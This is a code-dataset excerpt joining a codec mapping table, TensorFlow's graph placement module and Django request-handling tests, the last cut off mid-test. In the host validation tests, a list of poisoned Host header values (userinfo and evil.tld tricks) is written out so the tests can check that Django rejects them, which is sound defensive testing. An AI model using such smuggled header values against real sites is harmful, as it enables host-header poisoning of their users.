0x2552: 0x00d5, # BOX DRAWINGS DOWN SINGLE AND RIGHT DOUBLE
0x2553: 0x00d6, # BOX DRAWINGS DOWN DOUBLE AND RIGHT SINGLE
0x2554: 0x00c9, # BOX DRAWINGS DOUBLE DOWN AND RIGHT
0x2555: 0x00b8, # BOX DRAWINGS DOWN SINGLE AND LEFT DOUBLE
0x2556: 0x00b7, # BOX DRAWINGS DOWN DOUBLE AND LEFT SINGLE
0x2557: 0x00bb, # BOX DRAWINGS DOUBLE DOWN AND LEFT
0x2558: 0x00d4, # BOX DRAWINGS UP SINGLE AND RIGHT DOUBLE
0x2559: 0x00d3, # BOX DRAWINGS UP DOUBLE AND RIGHT SINGLE
0x255a: 0x00c8, # BOX DRAWINGS DOUBLE UP AND RIGHT
0x255b: 0x00be, # BOX DRAWINGS UP SINGLE AND LEFT DOUBLE
0x255c: 0x00bd, # BOX DRAWINGS UP DOUBLE AND LEFT SINGLE
0x255d: 0x00bc, # BOX DRAWINGS DOUBLE UP AND LEFT
0x255e: 0x00c6, # BOX DRAWINGS VERTICAL SINGLE AND RIGHT DOUBLE
0x255f: 0x00c7, # BOX DRAWINGS VERTICAL DOUBLE AND RIGHT SINGLE
0x2560: 0x00cc, # BOX DRAWINGS DOUBLE VERTICAL AND RIGHT
0x2561: 0x00b5, # BOX DRAWINGS VERTICAL SINGLE AND LEFT DOUBLE
0x2562: 0x00b6, # BOX DRAWINGS VERTICAL DOUBLE AND LEFT SINGLE
0x2563: 0x00b9, # BOX DRAWINGS DOUBLE VERTICAL AND LEFT
0x2564: 0x00d1, # BOX DRAWINGS DOWN SINGLE AND HORIZONTAL DOUBLE
0x2565: 0x00d2, # BOX DRAWINGS DOWN DOUBLE AND HORIZONTAL SINGLE
0x2566: 0x00cb, # BOX DRAWINGS DOUBLE DOWN AND HORIZONTAL
0x2567: 0x00cf, # BOX DRAWINGS UP SINGLE AND HORIZONTAL DOUBLE
0x2568: 0x00d0, # BOX DRAWINGS UP DOUBLE AND HORIZONTAL SINGLE
0x2569: 0x00ca, # BOX DRAWINGS DOUBLE UP AND HORIZONTAL
0x256a: 0x00d8, # BOX DRAWINGS VERTICAL SINGLE AND HORIZONTAL DOUBLE
0x256b: 0x00d7, # BOX DRAWINGS VERTICAL DOUBLE AND HORIZONTAL SINGLE
0x256c: 0x00ce, # BOX DRAWINGS DOUBLE VERTICAL AND HORIZONTAL
0x2580: 0x00df, # UPPER HALF BLOCK
0x2584: 0x00dc, # LOWER HALF BLOCK
0x2588: 0x00db, # FULL BLOCK
0x258c: 0x00dd, # LEFT HALF BLOCK
0x2590: 0x00de, # RIGHT HALF BLOCK
0x2591: 0x00b0, # LIGHT SHADE
0x2592: 0x00b1, # MEDIUM SHADE
0x2593: 0x00b2, # DARK SHADE
0x25a0: 0x00fe, # BLACK SQUARE
}
| apache-2.0 |
jart/tensorflow | tensorflow/python/grappler/graph_placer.py | 23 | 4478 | # Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Graph Placer."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import time
from tensorflow.core.protobuf import meta_graph_pb2
from tensorflow.core.protobuf import rewriter_config_pb2
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops as tf_ops
from tensorflow.python.grappler import cluster as gcluster
from tensorflow.python.grappler import hierarchical_controller
from tensorflow.python.grappler import item as gitem
from tensorflow.python.grappler import tf_optimizer
from tensorflow.python.training import training
def PlaceGraph(metagraph,
cluster=None,
allotted_time=3600,
hparams=None,
verbose=False):
"""Place the provided metagraph.
Args:
metagraph: the metagraph to place.
cluster: an optional set of hardware resources to optimize the placement for.
If none is specified, we'll optimize the placement for the hardware
available on the local machine.
allotted_time: the maximum amount of time in seconds to spend optimizing
the placement.
hparams: hyperparameters used to fine tune the placer.
verbose: prints debug information if True.
Returns:
The placed metagraph.
"""
if cluster is None:
cluster = gcluster.Cluster()
# Optimize the metagraph to speedup the placement
rewriter_config = rewriter_config_pb2.RewriterConfig()
optimized_graph = tf_optimizer.OptimizeGraph(
rewriter_config, metagraph, verbose=verbose, cluster=cluster)
optimized_metagraph = meta_graph_pb2.MetaGraphDef()
optimized_metagraph.CopyFrom(metagraph)
optimized_metagraph.graph_def.CopyFrom(optimized_graph)
item = gitem.Item(optimized_metagraph)
# Fill in default hyperparameters up front: the except clause below reads
# hparams.failing_signal, which would raise AttributeError if hparams were
# still None at that point.
if hparams is None:
hparams = hierarchical_controller.hierarchical_controller_hparams()
# We run with a single child
hparams.num_children = 1
# Measure the runtime achievable with the original placement.
try:
_, original_run_time, _ = cluster.MeasureCosts(item)
if verbose:
print("Runtime for original placement: " + str(original_run_time))
except errors.OpError as e:
if verbose:
print("Original placement isn't feasible: " + str(e))
original_run_time = hparams.failing_signal
with tf_ops.Graph().as_default():
# Place all the nodes of the controller on the CPU. We don't want them to
# fight for accelerator memory with the model to optimize.
with tf_ops.device("/device:CPU:0"):
model = hierarchical_controller.HierarchicalController(
hparams, item, cluster)
ops = model.build_controller()
session_creator = training.ChiefSessionCreator()
with training.MonitoredSession(session_creator=session_creator) as sess:
start_time = time.time()
current_time = start_time
while current_time - start_time < allotted_time:
grouping_actions = model.generate_grouping(sess)
input_to_seq2seq = model.create_group_embeddings(
grouping_actions, verbose=verbose)
model.generate_placement(input_to_seq2seq, sess)
try:
run_time = model.eval_placement(
sess,
verbose=verbose)
except errors.OpError as e:
if verbose:
print("Failed to run graph:" + str(e))
run_time = hparams.failing_signal
updated = model.update_reward(sess, run_time, verbose=verbose)
if updated and run_time < original_run_time:
if verbose:
print("Found better placement, with runtime " + str(run_time))
model.export_placement(metagraph)
model.process_reward(sess)
current_time = time.time()
return metagraph
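# A minimal usage sketch (hypothetical metagraph; building a real
# MetaGraphDef and the surrounding session setup are omitted):
#
#     from tensorflow.core.protobuf import meta_graph_pb2
#     mg = meta_graph_pb2.MetaGraphDef()   # populate from an actual model
#     placed = PlaceGraph(mg, allotted_time=600, verbose=True)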
| apache-2.0 |
nzavagli/UnrealPy | UnrealPyEmbed/Development/Python/2015.08.07-Python2710-x64-Source-vs2015/Python27/Source/django-1.8.2/tests/requests/tests.py | 65 | 34729 | # -*- encoding: utf-8 -*-
from __future__ import unicode_literals
import time
from datetime import datetime, timedelta
from io import BytesIO
from itertools import chain
from django.core.exceptions import SuspiciousOperation
from django.core.handlers.wsgi import LimitedStream, WSGIRequest
from django.http import (
HttpRequest, HttpResponse, RawPostDataException, UnreadablePostError,
build_request_repr, parse_cookie,
)
from django.test import RequestFactory, SimpleTestCase, override_settings
from django.test.client import FakePayload
from django.test.utils import str_prefix
from django.utils import six
from django.utils.encoding import force_str
from django.utils.http import cookie_date, urlencode
from django.utils.six.moves import http_cookies
from django.utils.six.moves.urllib.parse import urlencode as original_urlencode
from django.utils.timezone import utc
class RequestsTests(SimpleTestCase):
def test_httprequest(self):
request = HttpRequest()
self.assertEqual(list(request.GET.keys()), [])
self.assertEqual(list(request.POST.keys()), [])
self.assertEqual(list(request.COOKIES.keys()), [])
self.assertEqual(list(request.META.keys()), [])
# .GET and .POST should be QueryDicts
self.assertEqual(request.GET.urlencode(), '')
self.assertEqual(request.POST.urlencode(), '')
# and FILES should be MultiValueDict
self.assertEqual(request.FILES.getlist('foo'), [])
def test_httprequest_full_path(self):
request = HttpRequest()
request.path = request.path_info = '/;some/?awful/=path/foo:bar/'
request.META['QUERY_STRING'] = ';some=query&+query=string'
expected = '/%3Bsome/%3Fawful/%3Dpath/foo:bar/?;some=query&+query=string'
self.assertEqual(request.get_full_path(), expected)
def test_httprequest_full_path_with_query_string_and_fragment(self):
request = HttpRequest()
request.path = request.path_info = '/foo#bar'
request.META['QUERY_STRING'] = 'baz#quux'
self.assertEqual(request.get_full_path(), '/foo%23bar?baz#quux')
def test_httprequest_repr(self):
request = HttpRequest()
request.path = '/somepath/'
request.method = 'GET'
request.GET = {'get-key': 'get-value'}
request.POST = {'post-key': 'post-value'}
request.COOKIES = {'post-key': 'post-value'}
request.META = {'post-key': 'post-value'}
self.assertEqual(repr(request), str_prefix("<HttpRequest: GET '/somepath/'>"))
self.assertEqual(build_request_repr(request), str_prefix("<HttpRequest\npath:/somepath/,\nGET:{%(_)s'get-key': %(_)s'get-value'},\nPOST:{%(_)s'post-key': %(_)s'post-value'},\nCOOKIES:{%(_)s'post-key': %(_)s'post-value'},\nMETA:{%(_)s'post-key': %(_)s'post-value'}>"))
self.assertEqual(build_request_repr(request, path_override='/otherpath/', GET_override={'a': 'b'}, POST_override={'c': 'd'}, COOKIES_override={'e': 'f'}, META_override={'g': 'h'}),
str_prefix("<HttpRequest\npath:/otherpath/,\nGET:{%(_)s'a': %(_)s'b'},\nPOST:{%(_)s'c': %(_)s'd'},\nCOOKIES:{%(_)s'e': %(_)s'f'},\nMETA:{%(_)s'g': %(_)s'h'}>"))
def test_httprequest_repr_invalid_method_and_path(self):
request = HttpRequest()
self.assertEqual(repr(request), str_prefix("<HttpRequest>"))
request = HttpRequest()
request.method = "GET"
self.assertEqual(repr(request), str_prefix("<HttpRequest>"))
request = HttpRequest()
request.path = ""
self.assertEqual(repr(request), str_prefix("<HttpRequest>"))
def test_bad_httprequest_repr(self):
"""
If an exception occurs when parsing GET, POST, COOKIES, or META, the
repr of the request should show it.
"""
class Bomb(object):
"""An object that raises an exception when printed out."""
def __repr__(self):
raise Exception('boom!')
bomb = Bomb()
for attr in ['GET', 'POST', 'COOKIES', 'META']:
request = HttpRequest()
setattr(request, attr, {'bomb': bomb})
self.assertIn('%s:<could not parse>' % attr, build_request_repr(request))
def test_wsgirequest(self):
request = WSGIRequest({'PATH_INFO': 'bogus', 'REQUEST_METHOD': 'bogus', 'wsgi.input': BytesIO(b'')})
self.assertEqual(list(request.GET.keys()), [])
self.assertEqual(list(request.POST.keys()), [])
self.assertEqual(list(request.COOKIES.keys()), [])
self.assertEqual(set(request.META.keys()), {'PATH_INFO', 'REQUEST_METHOD', 'SCRIPT_NAME', 'wsgi.input'})
self.assertEqual(request.META['PATH_INFO'], 'bogus')
self.assertEqual(request.META['REQUEST_METHOD'], 'bogus')
self.assertEqual(request.META['SCRIPT_NAME'], '')
def test_wsgirequest_with_script_name(self):
"""
Ensure that the request's path is correctly assembled, regardless of
whether or not the SCRIPT_NAME has a trailing slash.
Refs #20169.
"""
# With trailing slash
request = WSGIRequest({'PATH_INFO': '/somepath/', 'SCRIPT_NAME': '/PREFIX/', 'REQUEST_METHOD': 'get', 'wsgi.input': BytesIO(b'')})
self.assertEqual(request.path, '/PREFIX/somepath/')
# Without trailing slash
request = WSGIRequest({'PATH_INFO': '/somepath/', 'SCRIPT_NAME': '/PREFIX', 'REQUEST_METHOD': 'get', 'wsgi.input': BytesIO(b'')})
self.assertEqual(request.path, '/PREFIX/somepath/')
def test_wsgirequest_with_force_script_name(self):
"""
Ensure that the FORCE_SCRIPT_NAME setting takes precedence over the
request's SCRIPT_NAME environment parameter.
Refs #20169.
"""
with override_settings(FORCE_SCRIPT_NAME='/FORCED_PREFIX/'):
request = WSGIRequest({'PATH_INFO': '/somepath/', 'SCRIPT_NAME': '/PREFIX/', 'REQUEST_METHOD': 'get', 'wsgi.input': BytesIO(b'')})
self.assertEqual(request.path, '/FORCED_PREFIX/somepath/')
def test_wsgirequest_path_with_force_script_name_trailing_slash(self):
"""
Ensure that the request's path is correctly assembled, regardless of
whether or not the FORCE_SCRIPT_NAME setting has a trailing slash.
Refs #20169.
"""
# With trailing slash
with override_settings(FORCE_SCRIPT_NAME='/FORCED_PREFIX/'):
request = WSGIRequest({'PATH_INFO': '/somepath/', 'REQUEST_METHOD': 'get', 'wsgi.input': BytesIO(b'')})
self.assertEqual(request.path, '/FORCED_PREFIX/somepath/')
# Without trailing slash
with override_settings(FORCE_SCRIPT_NAME='/FORCED_PREFIX'):
request = WSGIRequest({'PATH_INFO': '/somepath/', 'REQUEST_METHOD': 'get', 'wsgi.input': BytesIO(b'')})
self.assertEqual(request.path, '/FORCED_PREFIX/somepath/')
def test_wsgirequest_repr(self):
request = WSGIRequest({'REQUEST_METHOD': 'get', 'wsgi.input': BytesIO(b'')})
self.assertEqual(repr(request), str_prefix("<WSGIRequest: GET '/'>"))
request = WSGIRequest({'PATH_INFO': '/somepath/', 'REQUEST_METHOD': 'get', 'wsgi.input': BytesIO(b'')})
request.GET = {'get-key': 'get-value'}
request.POST = {'post-key': 'post-value'}
request.COOKIES = {'post-key': 'post-value'}
request.META = {'post-key': 'post-value'}
self.assertEqual(repr(request), str_prefix("<WSGIRequest: GET '/somepath/'>"))
self.assertEqual(build_request_repr(request), str_prefix("<WSGIRequest\npath:/somepath/,\nGET:{%(_)s'get-key': %(_)s'get-value'},\nPOST:{%(_)s'post-key': %(_)s'post-value'},\nCOOKIES:{%(_)s'post-key': %(_)s'post-value'},\nMETA:{%(_)s'post-key': %(_)s'post-value'}>"))
self.assertEqual(build_request_repr(request, path_override='/otherpath/', GET_override={'a': 'b'}, POST_override={'c': 'd'}, COOKIES_override={'e': 'f'}, META_override={'g': 'h'}),
str_prefix("<WSGIRequest\npath:/otherpath/,\nGET:{%(_)s'a': %(_)s'b'},\nPOST:{%(_)s'c': %(_)s'd'},\nCOOKIES:{%(_)s'e': %(_)s'f'},\nMETA:{%(_)s'g': %(_)s'h'}>"))
def test_wsgirequest_path_info(self):
def wsgi_str(path_info):
path_info = path_info.encode('utf-8') # Actual URL sent by the browser (bytestring)
if six.PY3:
path_info = path_info.decode('iso-8859-1') # Value in the WSGI environ dict (native string)
return path_info
# Regression for #19468
request = WSGIRequest({'PATH_INFO': wsgi_str("/سلام/"), 'REQUEST_METHOD': 'get', 'wsgi.input': BytesIO(b'')})
self.assertEqual(request.path, "/سلام/")
def test_parse_cookie(self):
self.assertEqual(parse_cookie('invalid@key=true'), {})
def test_httprequest_location(self):
request = HttpRequest()
self.assertEqual(request.build_absolute_uri(location="https://www.example.com/asdf"),
'https://www.example.com/asdf')
request.get_host = lambda: 'www.example.com'
request.path = ''
self.assertEqual(request.build_absolute_uri(location="/path/with:colons"),
'http://www.example.com/path/with:colons')
def test_near_expiration(self):
"Cookie will expire when an near expiration time is provided"
response = HttpResponse()
# There is a timing weakness in this test; the
# expected result for max-age requires that there be
# a very slight difference between the evaluated expiration
# time, and the time evaluated in set_cookie(). If this
# difference doesn't exist, the cookie time will be
# 1 second larger. To avoid the problem, put in a quick sleep,
# which guarantees that there will be a time difference.
expires = datetime.utcnow() + timedelta(seconds=10)
time.sleep(0.001)
response.set_cookie('datetime', expires=expires)
datetime_cookie = response.cookies['datetime']
self.assertEqual(datetime_cookie['max-age'], 10)
def test_aware_expiration(self):
"Cookie accepts an aware datetime as expiration time"
response = HttpResponse()
expires = (datetime.utcnow() + timedelta(seconds=10)).replace(tzinfo=utc)
time.sleep(0.001)
response.set_cookie('datetime', expires=expires)
datetime_cookie = response.cookies['datetime']
self.assertEqual(datetime_cookie['max-age'], 10)
def test_far_expiration(self):
"Cookie will expire when an distant expiration time is provided"
response = HttpResponse()
response.set_cookie('datetime', expires=datetime(2028, 1, 1, 4, 5, 6))
datetime_cookie = response.cookies['datetime']
self.assertIn(
datetime_cookie['expires'],
# Slight time dependency; refs #23450
('Sat, 01-Jan-2028 04:05:06 GMT', 'Sat, 01-Jan-2028 04:05:07 GMT')
)
def test_max_age_expiration(self):
"Cookie will expire if max_age is provided"
response = HttpResponse()
response.set_cookie('max_age', max_age=10)
max_age_cookie = response.cookies['max_age']
self.assertEqual(max_age_cookie['max-age'], 10)
self.assertEqual(max_age_cookie['expires'], cookie_date(time.time() + 10))
def test_httponly_cookie(self):
response = HttpResponse()
response.set_cookie('example', httponly=True)
example_cookie = response.cookies['example']
# A compat cookie may be in use -- check that it has worked
# both as an output string, and using the cookie attributes
self.assertIn('; %s' % http_cookies.Morsel._reserved['httponly'], str(example_cookie))
self.assertTrue(example_cookie['httponly'])
def test_unicode_cookie(self):
"Verify HttpResponse.set_cookie() works with unicode data."
response = HttpResponse()
cookie_value = '清風'
response.set_cookie('test', cookie_value)
self.assertEqual(force_str(cookie_value), response.cookies['test'].value)
def test_limited_stream(self):
# Read all of a limited stream
stream = LimitedStream(BytesIO(b'test'), 2)
self.assertEqual(stream.read(), b'te')
# Reading again returns nothing.
self.assertEqual(stream.read(), b'')
# Read a number of characters greater than the stream has to offer
stream = LimitedStream(BytesIO(b'test'), 2)
self.assertEqual(stream.read(5), b'te')
# Reading again returns nothing.
self.assertEqual(stream.readline(5), b'')
# Read sequentially from a stream
stream = LimitedStream(BytesIO(b'12345678'), 8)
self.assertEqual(stream.read(5), b'12345')
self.assertEqual(stream.read(5), b'678')
# Reading again returns nothing.
self.assertEqual(stream.readline(5), b'')
# Read lines from a stream
stream = LimitedStream(BytesIO(b'1234\n5678\nabcd\nefgh\nijkl'), 24)
# Read a full line, unconditionally
self.assertEqual(stream.readline(), b'1234\n')
# Read a number of characters less than a line
self.assertEqual(stream.readline(2), b'56')
# Read the rest of the partial line
self.assertEqual(stream.readline(), b'78\n')
# Read a full line, with a character limit greater than the line length
self.assertEqual(stream.readline(6), b'abcd\n')
# Read the next line, deliberately terminated at the line end
self.assertEqual(stream.readline(4), b'efgh')
# Read the next line... just the line end
self.assertEqual(stream.readline(), b'\n')
# Read everything else.
self.assertEqual(stream.readline(), b'ijkl')
# Regression for #15018
# If a stream contains a newline, but the provided length
# is less than the number of provided characters, the newline
# doesn't reset the available character count
stream = LimitedStream(BytesIO(b'1234\nabcdef'), 9)
self.assertEqual(stream.readline(10), b'1234\n')
self.assertEqual(stream.readline(3), b'abc')
# Now expire the available characters
self.assertEqual(stream.readline(3), b'd')
# Reading again returns nothing.
self.assertEqual(stream.readline(2), b'')
# Same test, but with read, not readline.
stream = LimitedStream(BytesIO(b'1234\nabcdef'), 9)
self.assertEqual(stream.read(6), b'1234\na')
self.assertEqual(stream.read(2), b'bc')
self.assertEqual(stream.read(2), b'd')
self.assertEqual(stream.read(2), b'')
self.assertEqual(stream.read(), b'')
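# In short: LimitedStream caps total reads at its declared length, and
# readline() honours both the newline and the remaining budget. A compact
# sketch of the same behaviour:
#
#     stream = LimitedStream(BytesIO(b'abc\ndef'), 5)
#     stream.readline()  # -> b'abc\n'
#     stream.read()      # -> b'd'  (the budget of 5 is now exhausted)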
def test_stream(self):
payload = FakePayload('name=value')
request = WSGIRequest({'REQUEST_METHOD': 'POST',
'CONTENT_TYPE': 'application/x-www-form-urlencoded',
'CONTENT_LENGTH': len(payload),
'wsgi.input': payload})
self.assertEqual(request.read(), b'name=value')
def test_read_after_value(self):
"""
Reading from request is allowed after accessing request contents as
POST or body.
"""
payload = FakePayload('name=value')
request = WSGIRequest({'REQUEST_METHOD': 'POST',
'CONTENT_TYPE': 'application/x-www-form-urlencoded',
'CONTENT_LENGTH': len(payload),
'wsgi.input': payload})
self.assertEqual(request.POST, {'name': ['value']})
self.assertEqual(request.body, b'name=value')
self.assertEqual(request.read(), b'name=value')
def test_value_after_read(self):
"""
Construction of POST or body is not allowed after reading
from request.
"""
payload = FakePayload('name=value')
request = WSGIRequest({'REQUEST_METHOD': 'POST',
'CONTENT_TYPE': 'application/x-www-form-urlencoded',
'CONTENT_LENGTH': len(payload),
'wsgi.input': payload})
self.assertEqual(request.read(2), b'na')
self.assertRaises(RawPostDataException, lambda: request.body)
self.assertEqual(request.POST, {})
def test_non_ascii_POST(self):
payload = FakePayload(urlencode({'key': 'España'}))
request = WSGIRequest({
'REQUEST_METHOD': 'POST',
'CONTENT_LENGTH': len(payload),
'CONTENT_TYPE': 'application/x-www-form-urlencoded',
'wsgi.input': payload,
})
self.assertEqual(request.POST, {'key': ['España']})
def test_alternate_charset_POST(self):
"""
Test a POST with non-utf-8 payload encoding.
"""
payload = FakePayload(original_urlencode({'key': 'España'.encode('latin-1')}))
request = WSGIRequest({
'REQUEST_METHOD': 'POST',
'CONTENT_LENGTH': len(payload),
'CONTENT_TYPE': 'application/x-www-form-urlencoded; charset=iso-8859-1',
'wsgi.input': payload,
})
self.assertEqual(request.POST, {'key': ['España']})
def test_body_after_POST_multipart_form_data(self):
"""
Reading body after parsing multipart/form-data is not allowed
"""
# Because multipart is used for large amounts of data i.e. file uploads,
# we don't want the data held in memory twice, and we don't want to
# silence the error by setting body = '' either.
payload = FakePayload("\r\n".join([
'--boundary',
'Content-Disposition: form-data; name="name"',
'',
'value',
'--boundary--'
'']))
request = WSGIRequest({'REQUEST_METHOD': 'POST',
'CONTENT_TYPE': 'multipart/form-data; boundary=boundary',
'CONTENT_LENGTH': len(payload),
'wsgi.input': payload})
self.assertEqual(request.POST, {'name': ['value']})
self.assertRaises(RawPostDataException, lambda: request.body)
def test_body_after_POST_multipart_related(self):
"""
Reading body after parsing multipart that isn't form-data is allowed
"""
# Ticket #9054
# There are cases in which the multipart data is related instead of
# being a binary upload, in which case it should still be accessible
# via body.
payload_data = b"\r\n".join([
b'--boundary',
b'Content-ID: id; name="name"',
b'',
b'value',
b'--boundary--'
b''])
payload = FakePayload(payload_data)
request = WSGIRequest({'REQUEST_METHOD': 'POST',
'CONTENT_TYPE': 'multipart/related; boundary=boundary',
'CONTENT_LENGTH': len(payload),
'wsgi.input': payload})
self.assertEqual(request.POST, {})
self.assertEqual(request.body, payload_data)
def test_POST_multipart_with_content_length_zero(self):
"""
Multipart POST requests with Content-Length >= 0 are valid and need to be handled.
"""
# According to:
# http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html#sec14.13
# Every request.POST with Content-Length >= 0 is a valid request,
# this test ensures that we handle Content-Length == 0.
payload = FakePayload("\r\n".join([
'--boundary',
'Content-Disposition: form-data; name="name"',
'',
'value',
'--boundary--'
'']))
request = WSGIRequest({'REQUEST_METHOD': 'POST',
'CONTENT_TYPE': 'multipart/form-data; boundary=boundary',
'CONTENT_LENGTH': 0,
'wsgi.input': payload})
self.assertEqual(request.POST, {})
def test_POST_binary_only(self):
payload = b'\r\n\x01\x00\x00\x00ab\x00\x00\xcd\xcc,@'
environ = {'REQUEST_METHOD': 'POST',
'CONTENT_TYPE': 'application/octet-stream',
'CONTENT_LENGTH': len(payload),
'wsgi.input': BytesIO(payload)}
request = WSGIRequest(environ)
self.assertEqual(request.POST, {})
self.assertEqual(request.FILES, {})
self.assertEqual(request.body, payload)
# Same test without specifying content-type
environ.update({'CONTENT_TYPE': '', 'wsgi.input': BytesIO(payload)})
request = WSGIRequest(environ)
self.assertEqual(request.POST, {})
self.assertEqual(request.FILES, {})
self.assertEqual(request.body, payload)
def test_read_by_lines(self):
payload = FakePayload('name=value')
request = WSGIRequest({'REQUEST_METHOD': 'POST',
'CONTENT_TYPE': 'application/x-www-form-urlencoded',
'CONTENT_LENGTH': len(payload),
'wsgi.input': payload})
self.assertEqual(list(request), [b'name=value'])
def test_POST_after_body_read(self):
"""
POST should be populated even if body is read first
"""
payload = FakePayload('name=value')
request = WSGIRequest({'REQUEST_METHOD': 'POST',
'CONTENT_TYPE': 'application/x-www-form-urlencoded',
'CONTENT_LENGTH': len(payload),
'wsgi.input': payload})
request.body # evaluate
self.assertEqual(request.POST, {'name': ['value']})
def test_POST_after_body_read_and_stream_read(self):
"""
POST should be populated even if body is read first, and then
the stream is read second.
"""
payload = FakePayload('name=value')
request = WSGIRequest({'REQUEST_METHOD': 'POST',
'CONTENT_TYPE': 'application/x-www-form-urlencoded',
'CONTENT_LENGTH': len(payload),
'wsgi.input': payload})
request.body # evaluate
self.assertEqual(request.read(1), b'n')
self.assertEqual(request.POST, {'name': ['value']})
def test_POST_after_body_read_and_stream_read_multipart(self):
"""
POST should be populated even if body is read first, and then
the stream is read second. Using multipart/form-data instead of urlencoded.
"""
payload = FakePayload("\r\n".join([
'--boundary',
'Content-Disposition: form-data; name="name"',
'',
'value',
'--boundary--'
'']))
request = WSGIRequest({'REQUEST_METHOD': 'POST',
'CONTENT_TYPE': 'multipart/form-data; boundary=boundary',
'CONTENT_LENGTH': len(payload),
'wsgi.input': payload})
request.body # evaluate
# Consume enough data to mess up the parsing:
self.assertEqual(request.read(13), b'--boundary\r\nC')
self.assertEqual(request.POST, {'name': ['value']})
def test_POST_connection_error(self):
"""
If wsgi.input.read() raises an exception while trying to read() the
POST, the exception should be identifiable (not a generic IOError).
"""
class ExplodingBytesIO(BytesIO):
def read(self, len=0):
raise IOError("kaboom!")
payload = b'name=value'
request = WSGIRequest({'REQUEST_METHOD': 'POST',
'CONTENT_TYPE': 'application/x-www-form-urlencoded',
'CONTENT_LENGTH': len(payload),
'wsgi.input': ExplodingBytesIO(payload)})
with self.assertRaises(UnreadablePostError):
request.body
def test_FILES_connection_error(self):
"""
If wsgi.input.read() raises an exception while trying to read() the
FILES, the exception should be identifiable (not a generic IOError).
"""
class ExplodingBytesIO(BytesIO):
def read(self, len=0):
raise IOError("kaboom!")
payload = b'x'
request = WSGIRequest({'REQUEST_METHOD': 'POST',
'CONTENT_TYPE': 'multipart/form-data; boundary=foo_',
'CONTENT_LENGTH': len(payload),
'wsgi.input': ExplodingBytesIO(payload)})
with self.assertRaises(UnreadablePostError):
request.FILES
class HostValidationTests(SimpleTestCase):
poisoned_hosts = [
'example.com@evil.tld',
'example.com:dr.frankenstein@evil.tld',
'example.com:dr.frankenstein@evil.tld:80',
'example.com:80/badpath',
'example.com: recovermypassword.com',
]
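# Each poisoned host above abuses URL syntax that naive parsers mishandle:
# userinfo smuggled with '@', a second ':' inside the port part, a path
# glued onto the port, or whitespace hiding a second hostname.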
@override_settings(
USE_X_FORWARDED_HOST=False,
ALLOWED_HOSTS=[
'forward.com', 'example.com', 'internal.com', '12.34.56.78',
'[2001:19f0:feee::dead:beef:cafe]', 'xn--4ca9at.com',
'.multitenant.com', 'INSENSITIVE.com',
])
def test_http_get_host(self):
# Check if X_FORWARDED_HOST is provided.
request = HttpRequest()
request.META = {
'HTTP_X_FORWARDED_HOST': 'forward.com',
'HTTP_HOST': 'example.com',
'SERVER_NAME': 'internal.com',
'SERVER_PORT': 80,
}
# X_FORWARDED_HOST is ignored.
self.assertEqual(request.get_host(), 'example.com')
# Check if X_FORWARDED_HOST isn't provided.
request = HttpRequest()
request.META = {
'HTTP_HOST': 'example.com',
'SERVER_NAME': 'internal.com',
'SERVER_PORT': 80,
}
self.assertEqual(request.get_host(), 'example.com')
# Check if HTTP_HOST isn't provided.
request = HttpRequest()
request.META = {
'SERVER_NAME': 'internal.com',
'SERVER_PORT': 80,
}
self.assertEqual(request.get_host(), 'internal.com')
# Check if HTTP_HOST isn't provided, and we're on a nonstandard port
request = HttpRequest()
request.META = {
'SERVER_NAME': 'internal.com',
'SERVER_PORT': 8042,
}
self.assertEqual(request.get_host(), 'internal.com:8042')
legit_hosts = [
'example.com',
'example.com:80',
'12.34.56.78',
'12.34.56.78:443',
'[2001:19f0:feee::dead:beef:cafe]',
'[2001:19f0:feee::dead:beef:cafe]:8080',
'xn--4ca9at.com', # Punycode for öäü.com
'anything.multitenant.com',
'multitenant.com',
'insensitive.com',
'example.com.',
'example.com.:80',
]
for host in legit_hosts:
request = HttpRequest()
request.META = {
'HTTP_HOST': host,
}
request.get_host()
# Poisoned host headers are rejected as suspicious
for host in chain(self.poisoned_hosts, ['other.com', 'example.com..']):
with self.assertRaises(SuspiciousOperation):
request = HttpRequest()
request.META = {
'HTTP_HOST': host,
}
request.get_host()
@override_settings(USE_X_FORWARDED_HOST=True, ALLOWED_HOSTS=['*'])
def test_http_get_host_with_x_forwarded_host(self):
# Check if X_FORWARDED_HOST is provided.
request = HttpRequest()
request.META = {
'HTTP_X_FORWARDED_HOST': 'forward.com',
'HTTP_HOST': 'example.com',
'SERVER_NAME': 'internal.com',
'SERVER_PORT': 80,
}
# X_FORWARDED_HOST is obeyed.
self.assertEqual(request.get_host(), 'forward.com')
# Check if X_FORWARDED_HOST isn't provided.
request = HttpRequest()
request.META = {
'HTTP_HOST': 'example.com',
'SERVER_NAME': 'internal.com',
'SERVER_PORT': 80,
}
self.assertEqual(request.get_host(), 'example.com')
# Check if HTTP_HOST isn't provided.
request = HttpRequest()
request.META = {
'SERVER_NAME': 'internal.com',
'SERVER_PORT': 80,
}
self.assertEqual(request.get_host(), 'internal.com')
# Check if HTTP_HOST isn't provided, and we're on a nonstandard port
request = HttpRequest()
request.META = {
'SERVER_NAME': 'internal.com',
'SERVER_PORT': 8042,
}
self.assertEqual(request.get_host(), 'internal.com:8042')
# Poisoned host headers are rejected as suspicious
legit_hosts = [
'example.com',
'example.com:80',
'12.34.56.78',
'12.34.56.78:443',
'[2001:19f0:feee::dead:beef:cafe]',
'[2001:19f0:feee::dead:beef:cafe]:8080',
'xn--4ca9at.com', # Punycode for öäü.com
]
for host in legit_hosts:
request = HttpRequest()
request.META = {
'HTTP_HOST': host,
}
request.get_host()
for host in self.poisoned_hosts:
with self.assertRaises(SuspiciousOperation):
request = HttpRequest()
request.META = {
'HTTP_HOST': host,
}
request.get_host()
@override_settings(DEBUG=True, ALLOWED_HOSTS=[])
def test_host_validation_disabled_in_debug_mode(self):
"""If ALLOWED_HOSTS is empty and DEBUG is True, all hosts pass."""
request = HttpRequest()
request.META = {
'HTTP_HOST': 'example.com',
}
self.assertEqual(request.get_host(), 'example.com')
# Invalid hostnames would normally raise a SuspiciousOperation,
# but we have DEBUG=True, so this check is disabled.
request = HttpRequest()
request.META = {
